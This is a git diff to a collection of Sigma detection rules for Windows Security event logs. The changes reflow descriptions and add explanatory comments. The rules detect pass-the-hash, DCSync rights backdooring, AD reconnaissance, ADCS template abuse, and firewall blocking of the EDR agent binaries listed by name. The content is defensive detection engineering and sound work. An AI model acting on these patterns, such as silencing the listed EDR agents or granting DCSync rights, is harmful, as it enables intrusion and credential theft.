c43c26be-2e87-46c7-8661-284588c5a53e related: - - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e - type: obsoletes + - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e + type: obsoletes status: stable -description: Detects activity when a member is added to a security-enabled global - group +description: Detects activity when a member is added to a security-enabled global group references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf @@ -25,8 +24,8 @@ detection: Channel: Security selection: EventID: - - 4728 - - 632 + - 4728 # A member was added to a security-enabled global group + - 632 # Security Enabled Global Group Member Added condition: security and selection falsepositives: - Unknown diff --git a/sigma/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml b/sigma/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml index 7ff84b48d..52187f1fc 100644 --- a/sigma/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml +++ b/sigma/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml @@ -1,11 +1,10 @@ title: A Member Was Removed From a Security-Enabled Global Group id: 02c39d30-02b5-45d2-b435-8aebfe5a8629 related: - - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e - type: obsoletes + - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e + type: obsoletes status: stable -description: Detects activity when a member is removed from a security-enabled global - group +description: Detects activity when a member is removed from a security-enabled global group references: - https://www.cisecurity.org/controls/cis-controls-list/ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf @@ -25,8 +24,8 @@ detection: Channel: Security selection: EventID: - - 633 - - 4729 + - 633 # Security Enabled Global Group Member Removed + - 4729 # A member was removed from a security-enabled global group condition: security and selection falsepositives: - Unknown diff --git a/sigma/builtin/security/account_management/win_security_overpass_the_hash.yml b/sigma/builtin/security/account_management/win_security_overpass_the_hash.yml index 30d13f699..1ebcd3141 100644 --- a/sigma/builtin/security/account_management/win_security_overpass_the_hash.yml +++ b/sigma/builtin/security/account_management/win_security_overpass_the_hash.yml @@ -1,8 +1,7 @@ title: Successful Overpass the Hash Attempt id: 192a0330-c20b-4356-90b6-7b7049ae0b87 status: test -description: Detects successful logon with logon type 9 (NewCredentials) which matches - the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. +description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module. references: - https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html author: Roberto Rodriguez (source), Dominik Schaudel (rule) diff --git a/sigma/builtin/security/account_management/win_security_pass_the_hash_2.yml b/sigma/builtin/security/account_management/win_security_pass_the_hash_2.yml index 2100aa5cf..cdb3e807d 100644 --- a/sigma/builtin/security/account_management/win_security_pass_the_hash_2.yml +++ b/sigma/builtin/security/account_management/win_security_pass_the_hash_2.yml @@ -1,8 +1,7 @@ title: Pass the Hash Activity 2 id: 8eef149c-bd26-49f2-9e5a-9b00e3af499b status: stable -description: Detects the attack technique pass the hash which is used to move laterally - inside the network +description: Detects the attack technique pass the hash which is used to move laterally inside the network references: - https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events - https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis @@ -16,8 +15,7 @@ tags: logsource: product: windows service: security - definition: The successful use of PtH for lateral movement between workstations - would trigger event ID 4624 + definition: The successful use of PtH for lateral movement between workstations would trigger event ID 4624 detection: security: Channel: Security diff --git a/sigma/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml b/sigma/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml index e6da0afaf..9b660e135 100644 --- a/sigma/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml +++ b/sigma/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml @@ -1,8 +1,7 @@ title: Scanner PoC for CVE-2019-0708 RDP RCE Vuln id: 8400629e-79a9-4737-b387-5db940ab2367 status: test -description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable - to CVE-2019-0708 RDP RCE aka BlueKeep +description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep references: - https://twitter.com/AdamTheAnalyst/status/1134394070045003776 - https://github.com/zerosum0x0/CVE-2019-0708 diff --git a/sigma/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml b/sigma/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml index 4667a26e6..7c509e3f5 100644 --- a/sigma/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml +++ b/sigma/builtin/security/account_management/win_security_scrcons_remote_wmi_scripteventconsumer.yml @@ -1,8 +1,7 @@ title: Remote WMI ActiveScriptEventConsumers id: 9599c180-e3a8-4743-8f92-7fb96d3be648 status: test -description: Detect potential adversaries leveraging WMI ActiveScriptEventConsumers - remotely to move laterally in a network +description: Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network references: - https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) diff --git a/sigma/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml b/sigma/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml index dad6363f2..2e88c96cb 100644 --- a/sigma/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml +++ b/sigma/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml @@ -1,8 +1,8 @@ title: A Security-Enabled Global Group Was Deleted id: b237c54b-0f15-4612-a819-44b735e0de27 related: - - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e - type: obsoletes + - id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e + type: obsoletes status: stable description: Detects activity when a security-enabled global group is deleted references: @@ -24,8 +24,8 @@ detection: Channel: Security selection: EventID: - - 4730 - - 634 + - 4730 # A security-enabled global group was deleted + - 634 # Security Enabled Global Group Deleted condition: security and selection falsepositives: - Unknown diff --git a/sigma/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml b/sigma/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml index 5d5c72929..0ca98a9cb 100644 --- a/sigma/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml +++ b/sigma/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml @@ -1,11 +1,10 @@ title: External Remote RDP Logon from Public IP id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2 related: - - id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc - type: derived + - id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc + type: derived status: experimental -description: Detects successful logon from public IP address via RDP. This can indicate - a publicly-exposed RDP port. +description: Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port. references: - https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html - https://twitter.com/Purp1eW0lf/status/1616144561965002752 @@ -34,16 +33,15 @@ detection: - 172.16.0.0/12 - 192.168.0.0/16 filter_ipv6: - - IpAddress: ::1 - - IpAddress|startswith: - - 'fe80:' - - fc - - fd + - IpAddress: ::1 # IPv6 loopback + - IpAddress|startswith: + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 filter_empty: IpAddress: '-' condition: security and (selection and not 1 of filter_*) falsepositives: - - Legitimate or intentional inbound connections from public IP addresses on the - RDP port. + - Legitimate or intentional inbound connections from public IP addresses on the RDP port. level: medium ruletype: Sigma diff --git a/sigma/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml b/sigma/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml index a3bc2b698..6b619a7d5 100644 --- a/sigma/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml +++ b/sigma/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml @@ -1,11 +1,10 @@ title: External Remote SMB Logon from Public IP id: 78d5cab4-557e-454f-9fb9-a222bd0d5edc related: - - id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2 - type: derived + - id: 259a9cdf-c4dd-4fa2-b243-2269e5ab18a2 + type: derived status: experimental -description: Detects successful logon from public IP address via SMB. This can indicate - a publicly-exposed SMB port. +description: Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port. references: - https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html - https://twitter.com/Purp1eW0lf/status/1616144561965002752 @@ -34,16 +33,15 @@ detection: - 172.16.0.0/12 - 192.168.0.0/16 filter_ipv6: - - IpAddress: ::1 - - IpAddress|startswith: - - 'fe80:' - - fc - - fd + - IpAddress: ::1 # IPv6 loopback + - IpAddress|startswith: + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 filter_empty: IpAddress: '-' condition: security and (selection and not 1 of filter_*) falsepositives: - - Legitimate or intentional inbound connections from public IP addresses on the - SMB port. + - Legitimate or intentional inbound connections from public IP addresses on the SMB port. level: high ruletype: Sigma diff --git a/sigma/builtin/security/account_management/win_security_susp_failed_logon_source.yml b/sigma/builtin/security/account_management/win_security_susp_failed_logon_source.yml index 4596cbb43..dd9d4d1be 100644 --- a/sigma/builtin/security/account_management/win_security_susp_failed_logon_source.yml +++ b/sigma/builtin/security/account_management/win_security_susp_failed_logon_source.yml @@ -1,8 +1,7 @@ title: Failed Logon From Public IP id: f88e112a-21aa-44bd-9b01-6ee2a2bbbed1 status: test -description: A login from a public IP can indicate a misconfigured firewall or network - boundary. +description: A login from a public IP can indicate a misconfigured firewall or network boundary. author: NVISO date: 2020/05/06 modified: 2023/01/11 @@ -24,9 +23,9 @@ detection: IpAddress|contains: '-' filter_ip_privatev4: IpAddress|startswith: - - '10.' - - 192.168. - - 172.16. + - '10.' # 10.0.0.0/8 + - 192.168. # 192.168.0.0/16 + - 172.16. # 172.16.0.0/12 - 172.17. - 172.18. - 172.19. @@ -42,13 +41,13 @@ detection: - 172.29. - 172.30. - 172.31. - - '127.' - - 169.254. + - '127.' # 127.0.0.0/8 + - 169.254. # 169.254.0.0/16 filter_ip_privatev6: - - IpAddress: ::1 - - IpAddress|startswith: - - 'fe80::' - - 'fc00::' + - IpAddress: ::1 # loopback + - IpAddress|startswith: + - 'fe80::' # link-local + - 'fc00::' # unique local condition: security and (selection and not 1 of filter_*) falsepositives: - Legitimate logon attempts over the internet diff --git a/sigma/builtin/security/account_management/win_security_susp_krbrelayup.yml b/sigma/builtin/security/account_management/win_security_susp_krbrelayup.yml index 9d93a03f5..bbd56a52a 100644 --- a/sigma/builtin/security/account_management/win_security_susp_krbrelayup.yml +++ b/sigma/builtin/security/account_management/win_security_susp_krbrelayup.yml @@ -1,8 +1,7 @@ title: KrbRelayUp Attack Pattern id: 749c9f5e-b353-4b90-a9c1-05243357ca4b status: test -description: Detects logon events that have characteristics of events generated during - an attack with KrbRelayUp and the like +description: Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like references: - https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g - https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml diff --git a/sigma/builtin/security/account_management/win_security_susp_rottenpotato.yml b/sigma/builtin/security/account_management/win_security_susp_rottenpotato.yml index 5a27b50ca..3ce1d85ff 100644 --- a/sigma/builtin/security/account_management/win_security_susp_rottenpotato.yml +++ b/sigma/builtin/security/account_management/win_security_susp_rottenpotato.yml @@ -1,8 +1,7 @@ title: RottenPotato Like Attack Pattern id: 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f status: test -description: Detects logon events that have characteristics of events generated during - an attack with RottenPotato and the like +description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like references: - https://twitter.com/SBousseaden/status/1195284233729777665 author: '@SBousseaden, Florian Roth' diff --git a/sigma/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml b/sigma/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml index 103e59aac..ee1f39b9f 100644 --- a/sigma/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml +++ b/sigma/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml @@ -1,13 +1,9 @@ title: Windows Filtering Platform Blocked Connection From EDR Agent Binary id: bacf58c6-e199-4040-a94f-95dea0f1e45a status: experimental -description: 'Detects a Windows Filtering Platform (WFP) blocked connection event - involving common Endpoint Detection and Response (EDR) agents. - - Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) - agents from reporting security events. - - ' +description: | + Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. + Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events. references: - https://github.com/netero1010/EDRSilencer - https://github.com/amjcyber/EDRNoiseMaker @@ -27,75 +23,75 @@ detection: selection: EventID: 5157 Application|endswith: - - \AmSvc.exe - - \cb.exe - - \CETASvc.exe - - \CNTAoSMgr.exe - - \CrAmTray.exe - - \CrsSvc.exe - - \CSFalconContainer.exe - - \CSFalconService.exe - - \CybereasonAV.exe - - \CylanceSvc.exe - - \cyserver.exe - - \CyveraService.exe - - \CyvrFsFlt.exe - - \EIConnector.exe - - \elastic-agent.exe - - \elastic-endpoint.exe - - \EndpointBasecamp.exe - - \ExecutionPreventionSvc.exe - - \filebeat.exe - - \fortiedr.exe - - \hmpalert.exe - - \hurukai.exe - - \LogProcessorService.exe - - \mcsagent.exe - - \mcsclient.exe - - \MsMpEng.exe - - \MsSense.exe - - \Ntrtscan.exe - - \PccNTMon.exe - - \QualysAgent.exe - - \RepMgr.exe - - \RepUtils.exe - - \RepUx.exe - - \RepWAV.exe - - \RepWSC.exe - - \sedservice.exe - - \SenseCncProxy.exe - - \SenseIR.exe - - \SenseNdr.exe - - \SenseSampleUploader.exe - - \SentinelAgent.exe - - \SentinelAgentWorker.exe - - \SentinelBrowserNativeHost.exe - - \SentinelHelperService.exe - - \SentinelServiceHost.exe - - \SentinelStaticEngine.exe - - \SentinelStaticEngineScanner.exe - - \sfc.exe - - \sophos ui.exe - - \sophosfilescanner.exe - - \sophosfs.exe - - \sophoshealth.exe - - \sophosips.exe - - \sophosLivequeryservice.exe - - \sophosnetfilter.exe - - \sophosntpservice.exe - - \sophososquery.exe - - \sspservice.exe - - \TaniumClient.exe - - \TaniumCX.exe - - \TaniumDetectEngine.exe - - \TMBMSRV.exe - - \TmCCSF.exe - - \TmListen.exe - - \TmWSCSvc.exe - - \Traps.exe - - \winlogbeat.exe - - \WSCommunicator.exe - - \xagt.exe + - \AmSvc.exe # Cybereason + - \cb.exe # Carbon Black EDR + - \CETASvc.exe # TrendMicro Apex One + - \CNTAoSMgr.exe # TrendMicro Apex One + - \CrAmTray.exe # Cybereason + - \CrsSvc.exe # Cybereason + - \CSFalconContainer.exe # CrowdStrike Falcon + - \CSFalconService.exe # CrowdStrike Falcon + - \CybereasonAV.exe # Cybereason + - \CylanceSvc.exe # Cylance + - \cyserver.exe # Palo Alto Networks Traps/Cortex XDR + - \CyveraService.exe # Palo Alto Networks Traps/Cortex XDR + - \CyvrFsFlt.exe # Palo Alto Networks Traps/Cortex XDR + - \EIConnector.exe # ESET Inspect + - \elastic-agent.exe # Elastic EDR + - \elastic-endpoint.exe # Elastic EDR + - \EndpointBasecamp.exe # TrendMicro Apex One + - \ExecutionPreventionSvc.exe # Cybereason + - \filebeat.exe # Elastic EDR + - \fortiedr.exe # FortiEDR + - \hmpalert.exe # Sophos EDR + - \hurukai.exe # Harfanglab EDR + - \LogProcessorService.exe # SentinelOne + - \mcsagent.exe # Sophos EDR + - \mcsclient.exe # Sophos EDR + - \MsMpEng.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \MsSense.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \Ntrtscan.exe # TrendMicro Apex One + - \PccNTMon.exe # TrendMicro Apex One + - \QualysAgent.exe # Qualys EDR + - \RepMgr.exe # Carbon Black Cloud + - \RepUtils.exe # Carbon Black Cloud + - \RepUx.exe # Carbon Black Cloud + - \RepWAV.exe # Carbon Black Cloud + - \RepWSC.exe # Carbon Black Cloud + - \sedservice.exe # Sophos EDR + - \SenseCncProxy.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \SenseIR.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \SenseNdr.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \SenseSampleUploader.exe # Microsoft Defender for Endpoint and Microsoft Defender Antivirus + - \SentinelAgent.exe # SentinelOne + - \SentinelAgentWorker.exe # SentinelOne + - \SentinelBrowserNativeHost.exe # SentinelOne + - \SentinelHelperService.exe # SentinelOne + - \SentinelServiceHost.exe # SentinelOne + - \SentinelStaticEngine.exe # SentinelOne + - \SentinelStaticEngineScanner.exe # SentinelOne + - \sfc.exe # Cisco Secure Endpoint (Formerly Cisco AMP) + - \sophos ui.exe # Sophos EDR + - \sophosfilescanner.exe # Sophos EDR + - \sophosfs.exe # Sophos EDR + - \sophoshealth.exe # Sophos EDR + - \sophosips.exe # Sophos EDR + - \sophosLivequeryservice.exe # Sophos EDR + - \sophosnetfilter.exe # Sophos EDR + - \sophosntpservice.exe # Sophos EDR + - \sophososquery.exe # Sophos EDR + - \sspservice.exe # Sophos EDR + - \TaniumClient.exe # Tanium + - \TaniumCX.exe # Tanium + - \TaniumDetectEngine.exe # Tanium + - \TMBMSRV.exe # TrendMicro Apex One + - \TmCCSF.exe # TrendMicro Apex One + - \TmListen.exe # TrendMicro Apex One + - \TmWSCSvc.exe # TrendMicro Apex One + - \Traps.exe # Palo Alto Networks Traps/Cortex XDR + - \winlogbeat.exe # Elastic EDR + - \WSCommunicator.exe # TrendMicro Apex One + - \xagt.exe # Trellix EDR condition: security and selection falsepositives: - Unlikely diff --git a/sigma/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml b/sigma/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml index f5dc92567..02892ab2a 100644 --- a/sigma/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml +++ b/sigma/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml @@ -1,14 +1,9 @@ title: Azure AD Health Monitoring Agent Registry Keys Access id: ff151c33-45fa-475d-af4f-c2f93571f4fe status: test -description: 'This detection uses Windows security events to detect suspicious access - attempts to the registry key of Azure AD Health monitoring agent. - - This detection requires an access control entry (ACE) on the system access control - list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft - Online\Reporting\MonitoringAgent. - - ' +description: | + This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. + This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent. references: - https://o365blog.com/post/hybridhealthagent/ - https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml diff --git a/sigma/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml b/sigma/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml index 36bd82de8..f82687bf6 100644 --- a/sigma/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml +++ b/sigma/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml @@ -1,19 +1,11 @@ title: Azure AD Health Service Agents Registry Keys Access id: 1d2ab8ac-1a01-423b-9c39-001510eae8e8 status: test -description: 'This detection uses Windows security events to detect suspicious access - attempts to the registry key values and sub-keys of Azure AD Health service agents - (e.g AD FS). - - Information from AD Health service agents can be used to potentially abuse some - of the features provided by those services in the cloud (e.g. Federation). - - This detection requires an access control entry (ACE) on the system access control - list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. - +description: | + This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). + Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). + This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys. - - ' references: - https://o365blog.com/post/hybridhealthagent/ - https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml diff --git a/sigma/builtin/security/win_security_account_backdoor_dcsync_rights.yml b/sigma/builtin/security/win_security_account_backdoor_dcsync_rights.yml index fa2ad56c6..5377c91fa 100644 --- a/sigma/builtin/security/win_security_account_backdoor_dcsync_rights.yml +++ b/sigma/builtin/security/win_security_account_backdoor_dcsync_rights.yml @@ -1,14 +1,11 @@ title: Powerview Add-DomainObjectAcl DCSync AD Extend Right id: 2c99737c-585d-4431-b61a-c911d86ff32f status: test -description: Backdooring domain object to grant the rights associated with DCSync - to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync - Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer +description: Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer references: - https://twitter.com/menasec1/status/1111556090137903104 - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf -author: Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; - Maxence Fossat +author: Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat date: 2019/04/03 modified: 2022/08/16 tags: @@ -17,14 +14,7 @@ tags: logsource: product: windows service: security - definition: The "Audit Directory Service Changes" logging policy must be configured - in order to receive events. Audit events are generated only for objects with - configured system access control lists (SACLs). Audit events are generated - only for objects with configured system access control lists (SACLs) and only - when accessed in a manner that matches their SACL settings. This policy covers - the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default - policy does not cover User objects. For that a custom AuditRule need to be - setup (See https://github.com/OTRF/Set-AuditRule) + definition: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule) detection: security: Channel: Security @@ -42,7 +32,6 @@ detection: - dnsZone condition: security and (selection and not 1 of filter*) falsepositives: - - New Domain Controller computer account, check user SIDs within the value attribute - of event 5136 and verify if it's a regular user or DC computer account. + - New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account. level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_account_discovery.yml b/sigma/builtin/security/win_security_account_discovery.yml index 2f1489213..ac44a8d05 100644 --- a/sigma/builtin/security/win_security_account_discovery.yml +++ b/sigma/builtin/security/win_security_account_discovery.yml @@ -1,8 +1,7 @@ title: AD Privileged Users or Groups Reconnaissance id: 35ba1d85-724d-42a3-889f-2e2362bcaf23 status: test -description: Detect priv users or groups recon based on 4661 eventid and known privileged - users or groups SIDs +description: Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs references: - https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html author: Samir Bousseaden @@ -24,17 +23,17 @@ detection: - SAM_USER - SAM_GROUP selection_object: - - ObjectName|endswith: - - '-512' - - '-502' - - '-500' - - '-505' - - '-519' - - '-520' - - '-544' - - '-551' - - '-555' - - ObjectName|contains: admin + - ObjectName|endswith: + - '-512' + - '-502' + - '-500' + - '-505' + - '-519' + - '-520' + - '-544' + - '-551' + - '-555' + - ObjectName|contains: admin filter: SubjectUserName|endswith: $ condition: security and (selection and selection_object and not filter) diff --git a/sigma/builtin/security/win_security_ad_replication_non_machine_account.yml b/sigma/builtin/security/win_security_ad_replication_non_machine_account.yml index 8473cc035..1d2bf5cc9 100644 --- a/sigma/builtin/security/win_security_ad_replication_non_machine_account.yml +++ b/sigma/builtin/security/win_security_ad_replication_non_machine_account.yml @@ -1,8 +1,7 @@ title: Active Directory Replication from Non Machine Account id: 17d619c1-e020-4347-957e-1d1207455c93 status: test -description: Detects potential abuse of Active Directory Replication Service (ADRS) - from a non machine account to request credentials. +description: Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials. references: - https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html - https://threathunterplaybook.com/library/windows/active_directory_replication.html @@ -27,8 +26,8 @@ detection: - 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 - 89e95b76-444d-4c62-991a-0facbeda640c filter: - - SubjectUserName|endswith: $ - - SubjectUserName|startswith: MSOL_ + - SubjectUserName|endswith: $ + - SubjectUserName|startswith: MSOL_ # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account condition: security and (selection and not filter) fields: - ComputerName diff --git a/sigma/builtin/security/win_security_ad_user_enumeration.yml b/sigma/builtin/security/win_security_ad_user_enumeration.yml index 8f72b0dac..7371c8ea9 100644 --- a/sigma/builtin/security/win_security_ad_user_enumeration.yml +++ b/sigma/builtin/security/win_security_ad_user_enumeration.yml @@ -5,7 +5,7 @@ description: Detects read access to a domain user from a non-machine account references: - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf - http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html - - https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all + - https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all # For further investigation of the accessed properties - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662 author: Maxime Thiebaut (@0xThiebaut) date: 2020/03/30 @@ -16,27 +16,29 @@ tags: logsource: product: windows service: security - definition: 'Requirements: The "Read all properties" permission on the user object - needs to be audited for the "Everyone" principal' + definition: 'Requirements: The "Read all properties" permission on the user object needs to be audited for the "Everyone" principal' detection: security: Channel: Security selection: EventID: 4662 + # Using contains as the data commonly is structured as "%{bf967aba-0de6-11d0-a285-00aa003049e2}" + # The user class (https://docs.microsoft.com/en-us/windows/win32/adschema/c-user) ObjectType|contains: bf967aba-0de6-11d0-a285-00aa003049e2 AccessMask|endswith: - - 1? - - 3? - - 4? - - 7? - - 9? - - B? - - D? - - F? + # Note: Since the Access Mask can have more than once permission we need to add all permutations that include the READ property + - 1? # This covers all access masks that are 1 bytes or shorter and the "Read Property" itself + - 3? # Read Property + Write Property + - 4? # Read Property + Delete Tree + - 7? # Read Property + Write Property + Delete Tree + - 9? # Read Property + List Object + - B? # Read Property + Write Property + List Object + - D? # Read Property + Delete Tree + List Object + - F? # Covers usage of all possible 2 bytes permissions with any or none of the single byte permissions filter_main_machine_accounts: - SubjectUserName|endswith: $ + SubjectUserName|endswith: $ # Exclude machine accounts filter_main_msql: - SubjectUserName|startswith: MSOL_ + SubjectUserName|startswith: MSOL_ # https://docs.microsoft.com/en-us/azure/active-directory/hybrid/reference-connect-accounts-permissions#ad-ds-connector-account condition: security and (selection and not 1 of filter_main_*) falsepositives: - Administrators configuring new users. diff --git a/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml b/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml index 837879b6e..9827c3a55 100644 --- a/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml +++ b/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml @@ -13,9 +13,7 @@ tags: logsource: product: windows service: security - definition: Certificate services loaded a template would trigger event ID 4898 - and certificate Services template was updated would trigger event ID 4899. - A risk permission seems to be coming if template contain specific flag. + definition: Certificate services loaded a template would trigger event ID 4898 and certificate Services template was updated would trigger event ID 4899. A risk permission seems to be coming if template contain specific flag. detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml b/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml index e069e9fd9..e401010b4 100644 --- a/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml +++ b/sigma/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml @@ -1,8 +1,7 @@ title: ADCS Certificate Template Configuration Vulnerability with Risky EKU id: bfbd3291-de87-4b7c-88a2-d6a5deb28668 status: test -description: Detects certificate creation with template allowing risk permission subject - and risky EKU +description: Detects certificate creation with template allowing risk permission subject and risky EKU references: - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf author: Orlinum , BlueDefenZer @@ -14,10 +13,7 @@ tags: logsource: product: windows service: security - definition: Certificate services loaded a template would trigger event ID 4898 - and certificate Services template was updated would trigger event ID 4899. - A risk permission seems to be coming if template contain specific flag with - risky EKU. + definition: Certificate services loaded a template would trigger event ID 4898 and certificate Services template was updated would trigger event ID 4899. A risk permission seems to be coming if template contain specific flag with risky EKU. detection: security: Channel: Security @@ -30,6 +26,7 @@ detection: - 2.5.29.37.0 selection11: TemplateContent|contains: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + selection20: EventID: 4899 NewTemplateContent|contains: @@ -39,6 +36,7 @@ detection: - 2.5.29.37.0 selection21: NewTemplateContent|contains: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + condition: security and ((selection10 and selection11) or (selection20 and selection21)) falsepositives: - Administrator activity diff --git a/sigma/builtin/security/win_security_add_remove_computer.yml b/sigma/builtin/security/win_security_add_remove_computer.yml index 4d6715f1e..de116cbd2 100644 --- 